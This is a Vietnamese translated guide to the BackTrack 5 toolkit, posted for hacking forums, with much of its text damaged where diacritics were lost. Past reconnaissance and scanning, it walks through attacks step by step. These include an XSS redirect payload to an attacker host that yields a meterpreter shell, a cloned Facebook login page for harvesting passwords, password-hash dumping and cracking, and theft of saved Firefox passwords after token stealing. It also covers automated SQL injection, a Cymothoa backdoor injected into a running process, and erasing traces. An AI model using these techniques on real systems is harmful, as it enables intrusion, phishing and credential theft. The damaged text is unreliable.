Tải bản đầy đủ (.pdf) (27 trang)

Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (3.01 MB, 27 trang )

Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 1




Tài liu hng dn s dng
BackTrack 5 – Ting Vit
Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 2

Mc lc
Li nói đu 3
Phn I : Thu thp thông tin và gii thiu v các công c VA 4
1. Thu thp thông tin : 4
2. ánh giá l hng : 6
Phn II : Các b công c khai thác ( exploit tools ) và frameworks 10
1. B công c Metasploit Armitage : 10
2. B công c Social-Engineer Tookit : 11
3. B công c leo thang đc quyn (Privilege escalation tools ) : 12
4. B công c John the Ripper : 13
Phn III : Các b công c khai thác và frameworks – tip theo 15
1. ánh cp các thông tin t trình duyt : 15
2. Thc nghim k thut đánh cp thông tin : 15
3. B công c Hashcat trong BackTrack 5 : 17
4. Thc nghim k thut leo thang đc quyn : 18
5. Khai thác SQL Injection trong BackTrack 5 : 18


6. S tht bt ng đng sau các công c mang tên khai thác t đng : 19
Phn IV : Làm th nào đ n mình 20
1. Ti sao phi n mình ? 20
2. OS backdoor

Cymothoa : 20
3. Meterpreter có phi là backdoor : 22
4. Li dng l hng đ có backdoor : 23
Phn V : Chi tit mt cuc tn công gi đnh 24
1. B công c Autoscan Network trong BackTrack 5 : 24
2. Tài nguyên l hng trc tuyn : 24
3. Pentest mc tiêu : 25
4. Xóa b du vt : 26
5. Tng quan v mô hình bo mt Windows : 26



Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 3

Li nói đu
Tài liu hng dn này cutynhangheo dành tng cho anh em HCEGroup và TheGioiMang.OrG nhân
ngày reopen ca 2 din đàn thân yêu nói trên .Và cutynhangheo có đôi li tâm s vi anh em mi vào
chi trò ngh thut này cái nhé .Trong ngh thut hack không có cái gi là s li bing và chây ý, anh
em nên quan nim 1 điu khi ta cm thy tha mãn vi nhng gì ta đang có tc là lúc đó ta bt đu lc
hu vi th gii .Trong ngh thut hack kin thc, k nng, t duy, s ranh ma và thêm mt chút may mn
luôn luôn đi chung vi nhau .Vì vy nu ta cm thy mình đã có đc nhng gì mình mun thì lúc đó
mình bt đu mt tt c .Cutynhangheo cng xin nói rng tài liu này ch dùng đ tham kho và s dng

đ thc nghim tn công ( pentest ) trong môi trng lab hoc c quan, t chc có nhu cu tn công thc
nghim trên h thng ca chính h .Kin thc trong cun sách hng dn này do cutynhangheo thu thp
và tham kho nhiu ngun trên Internet, chân thành cm n các tác gi v ngun tài liu mà
cutynhangheo đã tham kho qua .
Ln na cutynhangheo xin nhc li tài liu này cutynhangheo biên dch li và cung cp cho anh em
ch nhm mc đích hc tp và nghiên cu, cutynhangheo không chu trách nhim vic anh em s dng
kin thc, k thut và t duy trong cun tài liu này dùng đ vi phm pháp lut nc Cng Hòa Xã Hi
Ch Ngha Vit Nam .Mi hành vi mo danh hay s dng các kin thc nói trên cutynhangheo không chu
trách nhim trc pháp lut .

Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 4

Phn I : Thu thp thông tin và gii thiu v các công c VA
Phiên bn BackTrack 5 có tên mã là “Revolution” ( tm dch là “Ci tin” ), phiên bn này rt đc
gii bo mt (nht là gii Hack) mong đi; phiên bn này đc phát hành vào tháng 05 nm 2011 .So vi
phiên bn BackTrack 4 R2 thì phiên bn này có nhiu s phát trin mnh m hn rt nhiu .Phiên bn
BackTrack 5 này đc cho rng các nhà phát trin đã xây dng li t đu, cung cp cho chúng ta nhng
ci tin tt hn và cng nh fix các li so vi phiên bn BackTrack 4 R2 trc đó .
BackTrack 5 đc đt tên theo mt thut toán đc gi là “backtracking” .BackTrack 5 cung cp
mt b các công c t crack password, pentest và scan ports .BackTrack 5 có 12 b các công c đc th
hin nh hình 1 bên di .

Hình 1 :
Các b công c trong BackTrack 5
Ngi kim tra bo mt ( tm gi là Pentester – vi nhng ngi nh anh em chúng ta tm gi là
sript kiddies, nói dân dã 1 tí là dân đi hack, cutynhangheo xin nhc li là chúng ta cha phi là hacker
thc th OK ! ) thng thc hin các quá trình tn công thc nghim theo 5 bc ( tùy vào tng môi

trng và trng hp c th có th nhiu hn 5 bc ) nh sau :
1. Bc 1 là thu thp thông tin ca h thng cn tn công thc nghim .
2. Bc 2 là scan bugs ( quét li ) và đánh giá các đim yu có th có ca h thng cn tn công
thc nghim .
3. Bc 3 là tip cn vi h thng cn tn công thc nghim thông qua các đim yu có th có
ca h thng đó .
4. Bc 4 là duy trì truy cp vi h thng cn tn công thc nghim ( nói có v khìn khìn nhng
cutynhangheo ngh đây là bc to 1 backdoor cho ln truy cp sau vào h thng đó ) .
5. Bc 5 là xóa b tt c các du vt ( trong phim thì gi là “phi tang, dit chng”; hehehe ) .
Trong phn hng dn tn công thc nghim ( pentest ) vi BackTrack 5 này, chúng ta s cùng xem
xét qua phn thu thp thông tin và b công c đánh giá các l hng ( nu có ) đc cung cp trong phiên
bn BackTrack 5 này nhé .
1. Thu thp thông tin :

Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 5

Thu thp thông tin là bc tin hành đu tiên và cc k quan trng trong quá trình tn công thc
nghim .Trong bc này, pentester và attacker s thu thp và có đc các thông tin s b ca mc
tiêu cn tn công nh h thng mng mc tiêu, các cng đang m, h thng máy đang live và các
dch v đang chy trên tng cng đó .Theo bn ta thu thp đc gì ? Rt đn gin ta s có đc 1
bng thông tin v s đ cu trúc ca mc tiêu, bên cnh đó ta còn có thông tin v các h thng và h
thng mng đang đc s dng ca mc tiêu .Hình 2 bên di đây là hình chp ca công c Zenmap,
BackTrack cung cp công c này đ giúp pentester và attacker có th thu thp đc thông tin và
phân tích h thng mng ca mc tiêu .

Hình 2 : Công c Zenmap UI trong BackTrack 5


Các ch đ scan ca Zenmap s cung cp cho ta thông tin v mc tiêu nh dch v đang chy
trên tng cng, phiên bn h điu hành ca mc tiêu, đng đi đn mc tiêu, workgroups và tài
khon ngi dùng .Các thông tin này thc s hu ích vi phng pháp “white box testing” ( tt
nhiên cng hu ích vi attacker ) .
Mt công c thu thp thông tin khác trong BackTrack 5 đó là CMS identification và IDS – IPS
identification dùng đ thu thp thông tin và phân tích cho ng dng web .CMS identification s cung
cp các thông tin s b v h thng CMS mc tiêu, b công c này có th đc dùng đ đánh giá các
l hng trên h thng CMS và điu thun tin nht là b công c này cung cp các exploit ( khai thác
) có sn đ pentester và attacker có th kim tra trên h thng mc tiêu .Các công c nh joomscan (
CMS Joomla ) s đc nói sau trong phn hng dn này .
Mt công c thú v và cc k mnh khác na là Maltego, công c này thng dùng đ phân tích
v SMTP .Hình 3 bên di cho thy Maltego đang hot đng .
Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 6


Hình 3 :
Công c Maltego UI trong BackTrack 5

Trên bng Palette ca Maltego cho ta thy các thông tin nh DNS Name, Domain, Location,
URL, email và các thông tin chi tit khác v website .Maltego s dng các tùy bin khác nhau trên
các entities cung cp cho pentester và attacker các thông tin chi tit cn thit v mc tiêu .Maltego
cung cp mt kt qu trc quan bng giao din đ ha v các thông tin thu thp đc ca mc tiêu .

2. ánh giá l hng :

Bc th 2 trong tn công thc nghim pentest là đánh giá các l hng ( nu có ) .Sau khi đã
thc hin bc đu tiên thành công .

Thông tin và s đ t chc ca mc tiêu có đc thông qua footprinting ( nh hi xa
cutynhangheo đc đn đây c nh nh là “in du n” ), lúc này chúng ta s tin hành đánh giá phân
tích các đim yu hoc các l hng trong h thng cn tn công .Trên internet hin nay có rt nhiu
trang web v bo mt cung cp danh sách các l hng có th s dng đ khai thác, nhng chúng ta s
ch tp trung vào nhng gì BackTrack 5 cung cp trong series hng dn này nhé .
Web application scans đc s dng đ đánh giá và tìm các l hng ca ng dng web .Hình 4
bên di đây gii thiu v công c joomscan trong BackTrack 5 .Joomscan có tính nng là s dng
các l hng đc cung cp trong tài nguyên đ tìm kim l hng ca website chy trên nn Joomla .
Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 7


Hình 4 :
Công c Joomscan

Joomscan s dng câu lnh nh sau :


./joomscan.pl –u <string> -x proxy:port


Phn <string> chính là Website chy Joomla cn tn công .Joomscan có các tùy chn kèm theo
nh sau kim tra phiên bn ca Joomla, kim tra Server, kim tra Firewall đang hot đng …Nh
hình 4  trên Website Joomla mc tiêu đang chy trên máy ch web Apache Server và phiên bn PHP
đang s dng là 5.5.16 .
OpenVAS ( Open Vulnerability Assessment System ) trong BackTrack 5 : M Application



Backtrack

Vulnerability scanners

OpenVAS s cung cp cho bn mt danh sách các tùy chn
nh hình 5 bên di .

Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 8


Hình 5 :
Các tùy chn ca OpenVAS trong BackTrack 5 .

OpenVAS là mt công c mnh trong vic phân tích và đánh giá l hng đi vi mc tiêu cn tn
công .Nhng trc khi s dng b công c này nhà cung cp khuyn cáo bn cn thit lp chng
thc vi tùy chn OpenVAS MkCert .Sau đó, chúng ta cn to mt tài khon ngi dùng mi t trình
menu nh trong hng dn này .
Ngi dùng có th tùy chnh đ áp dng các rule ca mình, hoc s đc cung cp mt tp hp
rng bng cách nhn t hp phím Ctrl + D .Khi mt ngi dùng mi đã đc thêm vào vi các thông
tin đng nhp, chúng ta đã có th bt đu s dng b công c này .
Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 9


Hình 6 :

Quá trình thêm tài khon ca OpenVAS

OpenVAS hot đng đánh giá l hng trên mô hình Client/Server .Bn nên cp nht thng
xuyên danh sách các l hng mi cho th vin ca OpenVAS đ có th thc hin các bc kim tra có
hiu qu nht .
OpenVAS và Nessus Scanner :
Nessus Scanner là b công c phân tích và đánh giá l hng t đng .Chúng ta hãy lt qua
xem s khác bit gia 2 b công c này .
Nessus Scanner có 2 phiên bn, min phí và tr tin ( cái v này làm nhiu dân đi hack nh
chúng ta vô cùng ái ngi nh ! Cha hack mà đã tn tin ri ), trong khi đó OpenVAS thì li hoàn
toàn min phí ( cái này đc àh nghen, đng bao gi có suy ngh đ free là đ cùi anh em nhé, có
nhng đ free mà cht lng ngon hn hn đ tr tin đàng hoàng, mà xài đ free thì các bác
mun đánh bn quyn cng chng có c gì xi đc anh em ta ) .Theo đánh giá gn đây cho bit
thì các tài nguyên cung cp các plugins cho 2 b công c này có s khác nhau đáng k, và tùy
thuc vào nhn đnh ca mi ngi s đa ra nhn xét là s có 1 b công c đc khuyên không
nên s dng, tt nhiên 1 chng trình scan t đng s có th đa ra nhng đánh giá sai lm, điu
này là không th tránh khi ( anh em s hi cutynhangheo ti sao sai lm còn gii thiu,
cutynhangheo xin tr li vì bn cht chng trình do con ngi lp trình ra, nó ch bit làm theo
ch nó không có suy ngh nh con ngi nhé ).
Trên internet có rt nhiu nhóm đc lp ra đ hng dn cho nhau cách s dng các b
công c h tr khác, tt nhiên có c các b công c scan t đng, nhng cutynhangheo xin
khuyn cáo vi anh em nh sau ta ch s dng các b công c scan t đng đ đánh giá toàn din
các l hng ca các mc tiêu cn tn công .BackTrack 5 cng cung cp các b công c khác
cùng th loi nh các b công c CISCO, ngha là các b công c này đc s dng đ tìm l
hng trên h thng mng chy phn cng CISCO .Các Fuzzer cng đc cung cp, đc phân
thành 2 loi Network Fuzzers và VOIP Fuzzers .
ó là điu gii thích ti sao BackTrack 5 đc cung cp rt nhiu b công c đ thu thp thông
tin và đánh giá l hng .Trong phn hng dn này cutynhangheo s c gng gii thiu mt hoc hai
b công c mà cutynhangheo cm thy hu dng cho anh em nhé ( còn li nu anh em mun nâng
cao skill thì làm n t lên Google Search dùm cái h, có 1 câu ngn ng “Tôi ch cho cái cn câu

ch tôi không cho con cá” ) .
Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 10

Phn II : Các b công c khai thác ( exploit tools ) và frameworks
Trong phn đu ca cun hng dn v BackTrack 5 này, chúng ta đã đi qua 2 bc là thu thp
thông tin và đánh giá l hng vi các b công c đc gii thiu  trên .Trong phn hai này, chúng ta s
đc gii thiu v các b công c đ khai thác các l hng t xa và tìm hiu làm th nào đ s dng các
exploitation frameworks đ leo thang đc quyn ví d nh s dng John the Ripper đ crack mt khu và
truy cp vào mt h thng Windows t xa nhé .
1. B công c Metasploit Armitage :

Metasploit Armitage là phiên bn giao din đ ha ca b công c khai thác l hng ni ting
Metasploit Framework .Cutynhangheo s vit mt series v hng dn s dng Metasploit trong thi
gian sp ti và s cung cp sm cho anh em .Trong cun sách hng dn v BackTrack 5 này, chúng
ta s đc gii thiu cách s dng autopwn đ khai thác l hng trình duyt trên h thng Windows
XP bng b công c Metasploit Armitage .

Hình 7 :
B công c Metasploit Armitage ; h thng Windows b xâm nhp t xa đc th hin bng màu
đ .Giao din console bên di cho thy quá trình s dng autopwn đ khai thác l hng trình duyt trên
h thng … Armitage cng thu thp đc thông tin v h điu hành ca mc tiêu tn công .

Vi phn hng dn khai thác này, anh em cn 1 website b li cross-site scripting ( XSS ) vi l
hng là URL redirection ( chuyn hng URL ) .Khi victim nhp chut vào 1 URL c th nào đó trên
trình duyt, h thng ca victim s to ra mt meterpreter shell .on code URL redirection s có
dng nh sau :



?c="><meta HTTPEQUIV="REFRESH" content="0; url=http://attacker">


Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 11

Tính nng auto-migration đc s dng khai thác s to ra mt tin trình mi trên h thng
victim, bi vì nu nh chúng ta s dng phng pháp khai thác l hng không s dng migration, thì
cuc tn công s b hy b hoc kt thúc khi ngi dùng đóng trình duyt .Vì vy Migration s giúp
chúng ta duy trì trng thái kt ni liên tc vi h thng victim cho dù victim có đóng trình duyt đi
chng na .

Hình 8 : Mt minh ha v URL redirection t 1 website b li XSS , xyz.com, đn 192.168.13.132 attacker

2. B công c Social-Engineer Tookit :

B công c Social- Engineer Tookit ( SET ) s đc cutynhangheo gii thiu chi tit trong mt
cun sách hng dn khác trong thi gian sp ti .Trong phn hng dn BackTrack 5 này, chúng ta
s tp trung vào kiu tn công đc gi là tab nabbing .Trong mt cuc tn công gi đnh, victim m
1 liên kt trên trình duyt, ngay sau khi victim chuyn sang 1 tab khác, trang web ban đu s đc
thay th bng 1 trang web gi mo, kiu tn công này cho phép các attacker có đc các thông tin
đng nhp ca victim .Victim s b đánh la đ nhp tên tài khon và mt khu ca anh ta vào trang
gi mo này .
Trong kiu tn công “social engineer” này, chúng ta s chn 1 website đ tn công vector và
clone trang web đó .Chúng ta cn xác đnh nhng trang web nào chúng ta cn clone, có các form
đng nhp thông tin mà chúng ta mong mun .Cutynhangheo đã clone 1 trang ca Facebook cho
phn hng dn BackTrack 5 này vi mc đích ch là trình din ( cutynhangheo không khuyn khích

anh em làm điu tng t ) .Xin lu ý anh em rng quá trình clone s không có tác dng khi chúng ta
không có kt ni internet nhé .
Hình 9 bên di cho thy trang đng nhp Facebook gi mo, và hình 10 bên di các d liu
gi qua phng thc POST b SET bt li .
Phng pháp tn công này có th m rng vi các URL mà anh em d tính clone, các trang web
s dng phng thc POST đ đy d liu, thông tin đó s luôn b thu thp li bi HTTP hoc
HTTPS .SET h tr tt 2 giao thc trên, và cho kt qu tt khi sniffs thông tin đng nhp .
Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 12


Hình 9 :
Mt trang đng nhp gi mo Facebook đc to ra bi b công c Social-Engineer Toolkit vi
các tùy chn đc cu hình bi attacker .

Hình 10 : D liu POST b thu thp bi b công c Social-Engineer Toolkit framework t 1 trang đng
nhp gi mo Facebook .

3. B công c leo thang đc quyn (Privilege escalation tools ) :
Chúng ta bit rng không phi lúc nào chúng ta cng có quyn administrator hay superuser đ
có th xâm nhp vào mt h thng t xa c ( d n quá thì không còn gì là thú v OK ! ) .Ging nh 1
attacker, chúng ta cn mt quyn ti đa trên h thng victim đ có th thc thi các payloads và thc
hin các hành đng chúng ta mong mun ( ví d leo lên quyn administrator hay get root gì đó )
.BackTrack 5 cung cp cho chúng ta 1 lot các b công c leo thang đc quyn đ đáp ng nhng
nhu cu thc tin này, ging hình 11 bên di .
Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012


Ngi biên dch : Trang 13


Hình 11 :
Các phân loi trong b công c leo thang đc quyn trong BackTrack 5 .

Nh trên hình 11 chúng ta thy, BackTrack 5 cung cp 4 phân loi trong b công c leo thang
đc quyn, mi loi đu có cách làm vic khác nhau ( đ hiu ht các phân loi này, cutynhangheo đ
ngh anh em s dng đ cm nhn ) .

4. B công c John the Ripper :

Mt khi victim đã b xâm nhp ( cutynhangheo đ ngh anh em cha bit làm sao xâm nhp xin
đc li cun hng dn s dng SET và MSF ca cutynhangheo đ bit thêm chi tit nhé, không gii
thích trong phn hng dn này mt lm ), các cracker thng s dng b công c John the Ripper
đ crack các Password Windows hashes t đó s dng đ leo thang đc quyn và có đc quyn
qun tr h thng .
Sau khi khai thác qua l hng, các pass hashes này s đc dump li thành 1 file text và cung cp
cho John the Ripper .John the Ripper là b công c rt mnh v vic crack các password hashes
.Hình 12 và 13 bên di th hin quá trình crack password hashes liên quan đn vic leo thang đc
quyn trên h thng Windows .Cuc tn công nh demo có th s dng 2 b công c Metasploit
Framework hay Social-Engineer Toolkit .

Hình 12 :
ây là quá trình dump password hashes bng b công c hashdump, kt quá này s xut ra file
text đ cung cp cho John the Ripper thc hin crack pass .

H thng victim theo nh hình bên di s đc lit kê danh sách các tài khon và mt khu theo
cách ca John the Ripper .
Tài liu hng dn s dng BackTrack 5 – Ting Vit

2012

Ngi biên dch : Trang 14


Hình 13 :
Danh sách đc sp xp theo Username:Password

Vi mt khu có trên thì vic leo thang đc quyn trên h thng victim lúc này qu tht quá đn
gin anh em nh .Trong phân h b công c phân tích các giao thc, chúng ta có 1 b công c là
WireShark, b công c này đc xp đu bng trong các công c phân tích lung các traffic trên h
thng mng .Cutynhangheo s c gng hoàn thin cun sách nói v b công c WireShark này trong
thi gian sm nht cho anh em.
ây là bng chng cho vic BackTrack 5 đã phát trin rt rt nhiu .Mt attacker thông minh và
ranh ma có th tn dng và s dng ti đa các b công c này, và attacker có th kt hp chúng li
đ đa dng hóa và ti đa hóa cho li ích ca attacker .Trong phn hng dn này, cutynhangheo xin
nhn mnh li vic quan trng nht trong mt cuc tn công gi đnh là s dng các công c đ leo
thang đc quyn .Trong phn hng dn tip theo cutynhangheo s cung cp thêm cho anh em mt s
k thut leo thang đc quyn khác na ( đ bit đc nhiu hn ch có chm ch, cn cù ngi đc và
search giáo s Google nhé ) .

















Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 15

Phn III : Các b công c khai thác và frameworks – tip theo
Khi BackTrack 5 phát hành vào tháng 05 nm 2011, đã có rt nhiu b công c pentest frameworks
đc ch đi .Chính đi này đã khin cutynhangheo quyt tâm vit phn hng dn s dng BackTrack 5
phn th 3 này đ cùng anh em tìm hiu và khám phá các b công c khai thác các li ca trình duyt
chng hn nh đánh cp thông tin quan trng, leo thang đc quyn Website và khôi phc mt khu .ây
là mt phn trong cun sách hng dn s dng BackTrack 5 này, cutynhangheo s cung cp cho anh em
cái nhìn tng quan v khai thác t đng vi li SQL Injection bng cách s dng b công c
DarkMySQLi .

1. ánh cp các thông tin t trình duyt :

Phn hng dn trc cutynhangheo đã có gii thiu qua v cách đ khai thác mc tiêu victim
bng cách s dng các payloads .Trong phn này cutynhangheo s s dng các modules ca
Metasploit Framework đ tn công h thng Windows, đánh cp các thông tin trình duyt lu tr
trong Mozilla Firefox chy trên h thng Windows XP .Mt b công c ca nhà cung cp th 3 có tên
gi là Firepassword s ly tt c thông tin mt khu đc lu tr trên trình duyt Mozilla Firefox
trên h thng victim .
Chúng ta s s dng l hng ph bin là WinXP RPC DCOM đ khai thác và xâm nhp h thng
victim, khi to 1 Metasploit Shell và thc hin các bc đ khai thác thông tin .Nu victim có s

dng tính nng Master Password trong Mozilla Firefox, đây là thông tin quan trng nht ta cn phi
ly đu tiên, vì nu ta có Master Password ta có th xem đc các mt khu khác trong Mozilla
Firefox 1 cách cc k d dàng .Thông thng thì Master Password rt ít khi đc s dng, chính vì
th điu này cho phép chúng ta có th d dàng ly các thông tin đc lu tr trong trình duyt .

2. Thc nghim k thut đánh cp thông tin :

Mc tiêu cn đt đn ca pentester và hacker m đen là ging nhau v phng thc thc hin, c
th là xâm nhp vào h thng mng và đánh cp thông tin d liu .Tuy nhiên, vi hacker m đen h
s đem thông tin đó đem bán cho nhng ai cn đn hoc s dng cho mc đích khác, thì pentester s
thông báo các d liu b đánh cp đó cho c quan, t chc đã yêu cu anh ta thc hin quá trình
pentest, vi tính toàn vn, bo mt và trách nhim .
Các thông tin thng b đánh cp nht bao gm thông tin cá nhân vì thông tin này có th s dng
cho kiu tn công social engineering, th tín dng hoc các thông tin chi tit v tài chính; và có th
có c biên lai và hóa đn hoc các thông tin nhy cm ca công ty trong hp th email .Nói chung
mi th nhy cm thì hacker m đen h đu mun đánh cp .
Vì vy, kim tra bt k các d liu có th s b đánh cp là mt bc rt quan trông trong quá
trình pentest, nó chính là mt báo cáo đy đ và trung thc nht cho c quan, t chc đó .Hình 14
bên di cho thy s thit hi s có ca victim .
Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 16


Hình 14 : Quá trình xâm nhp thành công trên h thng Windows XP .

Ti đây, nh phn nói  trên, chúng ta s thc hin ti firepassword.exe lên h thng ca victim
đ thc hin quá trình đánh cp mt khu đc lu tr trên Firefox .
S dng câu lnh upload đ thc hin quá trình ti file lên trong môi trng meterpreter shell .

Mt file Firepassword đã đc ti lên ( Hình 15 ) .Và d liu s đc nhìn thy nh hình 16 .

Hình 15 :
File Firepassword.exe đã đc ti lên thành công trên h thng victim .

Bây gi chúng ta ch cn chy file Firepassword.exe đ thy đc các mt khu có trong h
thng .Nhng ( hè hè …anh em nên nh không có cái gì đc gi là đn gin trong trò chi c, nht
là trong ngh thut hack nhé, nu đn gin và d làm thì đã có khi ngi làm đc không đn phiên
chúng ta nhé ) có mt điu cn phi chú ý  đây .iu này s hu ích cho t duy ca anh em ( nu
anh em xem hack là mt nim đam mê nhé ), đó là chúng ta cn kim tra cp đ ngi dùng ca
victim mt khi anh em đã xâm nhp vào h thng ca victim .Ví d di đây s gii thích cho anh em
d hiu hn nhé, khi ta xâm nhp vào h thng Windows XP vi quyn “System”, nhng đ cho file
Firepassword.exe chy đc ta cn phi có quyn “Administrator” .Do đó, đ thay đi cp đ ngi
dùng chúng ta có th s dng phng pháp sau .

2.1. S dng câu lnh ps trong môi trng meterpreter đ lit kê tt c các tin trình đang thc
hin trên h thng victim theo PIDs, tìm tin trình explorer.exe hoc bt k mt tin trình nào
đang thc hin vi quyn “Administrator” .
Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 17

2.2. Bây gi chúng ta sao chép PID này và s dng câu lnh steal_token đ thay đi cp đ
quyn ca user thành quyn “Administrator” .
2.3.  kim tra quyn user hin ti mà anh em đang truy cp, s dng câu lnh getuid trong môi
trng meterpreter shell .
Mt khi đã tr thành Administrator, anh em chy file Firepassword.exe đ m Windows shell
trong môi trng meterpreter và kim tra các mt khu đc lu tr nh trong hình 16 bên di đây.


Hình 16 : Các tài khon và mt khu đc lu tr đc hin th khi s dng Firepassword.exe

i vi hng dn trên, anh em cn lu ý mt điu là tin trình ch đc thc hin thành công
khi anh em bit đc Master password trong trình duyt Mozilla Firefox .Chín trong s mi ln
thc hin thì cutynhangheo nhn thy tính nng Master password ít đc ngi s dng lu tâm mà
thit lp nó, và các thông tin có th s b đánh cp .Vì vy, trong trò chi này luôn luôn kèm theo tính
may mn nhé anh em .
Ngoài ra cng có mt s b công c khác đc cung cp bi bên th 3 dùng đ đánh cp các mt
khu trên các trình duyt khác na .

3. B công c Hashcat trong BackTrack 5 :
Hashcat là b công c min phí, có nhiu ci tin, đa nn tng, công c phc hi mt khu trên
nhiu h điu hành .Các nn tng đc h tr bao gm CUDA, OpenCL và CPU, và mt s khác …
Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 18


Hình 17 : Các câu lnh ca Hashcat trong BackTrack 5
Trong phn hng dn này, nh trên hình 17 anh em có th thy đc cú pháp đ s dng
Hashcat vi li chú thích rõ ràng cho mi tùy chn .Các tùy chn này đc phân loi nh sau :

3.1. Khi đng chng trình .
3.2. ng nhp và các file ca chng trình .
3.3. Qun lý tài nguyên h thng .
3.4. Các kiu tn công, bao gm brute force, table lookups và permutations .

4. Thc nghim k thut leo thang đc quyn :


Mt cuc tn công thng theo các cách ch yu nh sau ngha là khi xâm nhp vào h thng
victim anh em thng s có quyn hn user rt thp hoc có th nói là bình thng .Bc sau đó, là
cn kim tra các l hng local đ ta có th t đó leo thang lên quyn cao nht ca h thng victim
.iu này cc k quan trng, đ ta có đc các quyn nh mong mun, yêu cu chúng ta cn thc
hin quá trình đánh giá mc đ an ninh ca h thng victim .Các b công c nh “Backtrack 

Privilege escalation 
Online attacks / Offline attacks” đã đc phát trin đ làm nhng vic này.
Hu ht các tin trình trong h thng Windows đu có th đc thc thi vi quyn
“Administrator”, nhng mt s ít, quyn “system” li đc thc thi .BackTrack 5 có các b công c
nh meterpreter to điu kin thun li đ leo thang đc quyn .

5. Khai thác SQL Injection trong BackTrack 5 :

SQL Injection đc xp hng s 1 trong OWASP Top 10 l hng v bo mt trong ng dng web
.Nó có th đc thc hin khai thác bng tay hoc bng các b công c khai thác t đng .Phng
pháp khai thác bng tay thì cc k nhàm chán và mt thi gian ca anh em ta ( cái này đúng vi các
đng chí chi UG nhé ), trong khi đó phng pháp khai thác t đng thì nhanh hn, thân thin vi
ngi s dng và có nhiu hiu qu hn ( chun không cn chnh ) .Havij là mt trong nhng công
c khai thác SQL Injection t đng nh nói trên .
Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 19

Trong phn hng dn này chúng ta ch đ cp đn b công c DarkMySqli dùng đ SQL
Injection t đng vào website victim .
Cu trúc câu lnh nh sau :



python DarkMySQLi.py –u
http://target


B công c này s scan toàn b website victim, bng cách s dng câu lnh trên trong console
.ng dn đy đ ca b công c trên trong BackTrack 5 là /pentest/web/DarkMySQLi .

6. S tht bt ng đng sau các công c mang tên khai thác t đng :

Hin nay có rt nhiu nhà cung cp bán các sn phm pentest t đng vi li mi chào nh “R
hn, Nhanh hn và Chính xác hn” .Vi vic chi phí và thi gian b hn ch, tt nhiên các nhà
cung cp này s là la chn hàng đu .Nhng chúng ta cn có cái nhìn tng quan v các công c
pentest t đng nh sau nó s làm mi ngi có cái nhìn sai v bo mt, nó thu hp khong cách,
không cn bn phi có kin thc v IT và chính sách bo mt .Mi ngi cn có đánh giá khách quan
v u và khuyt đim ca mt trong hai phng pháp mà cutynhangheo đã gii thiu  trên, và cng
cn da trên nhu cu thc t ca c quan, t chc .
Trong phn hng dn này, chúng ta đã đc gii thiu s qua v Web exploitation framework,
đánh cp thông tin trình duyt bng các b công c ca nhà cung cp th 3, và ti chúng lên h
thng ca victim .Trong phn hng dn sp ti cutynhangheo s gii thiu các khía cnh khác ca
lnh vc an toàn thông tin, forensics và reverse engineering .
















Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 20

Phn IV : Làm th nào đ n mình
Trong phn hng dn trc, chúng ta đã đc gii thiu s qua v các phng pháp thu thp thông
tin và đánh giá l hng ca h thng mc tiêu, phân tích h thng mng, scan và truy cp vào mc tiêu,
và mt s công c v leo thang đc quyn .Trong phn này chúng ta s xem xét qua vn đ làm th nào đ
n mình .

1. Ti sao phi n mình ?

Mc đích ca vic pentest là lp li các hành đng ca nhng attacker có s dng mã đc
.Không mt attacker nào mun mình b phát hin khi xâm nhp trái phép vào mt h thng mng, vì
vy k thut n mình luôn luôn đc attacker s dng đn .Khi pentester thc hin quá trình xâm
nhp cng phi s dng k thut n mình ging nh vy, đ đánh giá h thng mt cách trung thc
nht .

Hình 18 : B công c “Maintainning Access” trong BackTrack 5, chúng ta tp trung vào phn OS
Backdoors .

Trong phn này s hng dn anh em làm th nào đ s dng tính nng “Maintainning Access”,
trong đó s có các tùy chn nh OS Backdoors, Tunneling và Web Backdoors nh hình 18 .


2. OS backdoor

Cymothoa :
Cymothoa là b công c dùng đ n backdoor trong BackTrack 5, có ngha là backdoor shell
code s đc chèn vào trong mt tin trình đang tn ti .B công c này đc phát trin bi
codewizard và crossbrowser ca ElectronicSouls .
Các tùy chn ca b công c đc s dng nh sau :


Cymothoa –p <pid> -s <shellcode number> [options]


Tài liu hng dn s dng BackTrack 5 – Ting Vit
2012

Ngi biên dch : Trang 21

Cymothoa đc cung cp bao gm các payloads có sn .Chúng đc đánh s t 0

14 .B công
c này có rt nhiu tùy chn bao gm nh tùy chn chính, tùy chn inject và các tùy chn v
payloads .

Hình 19 : Trên đây là quá trình chy Cymothoa vi pid 1484 và lng nghe  port 100

Nh hình 19 bên trên, th hin các hành đng ca Cymothoa, các kt qu vi port 100 ti tin
trình 1484 .

Hình 20 :
Trc khi chy Cymothoa .


Hình 21 : Sau khi chy Cymothoa .

Khi chúng ta đã thc hin quá trình chèn shell code vào, chúng ta có th s dng lnh netstat –l
đ hin th các port 100 nào đang đc lng nghe, vi hình 21 đây là kt qu sau khi chúng ta chèn
shell code numbered 0 vào tin trình 1484 .Vì vy chúng ta có th thy rng, chúng ta có th chy
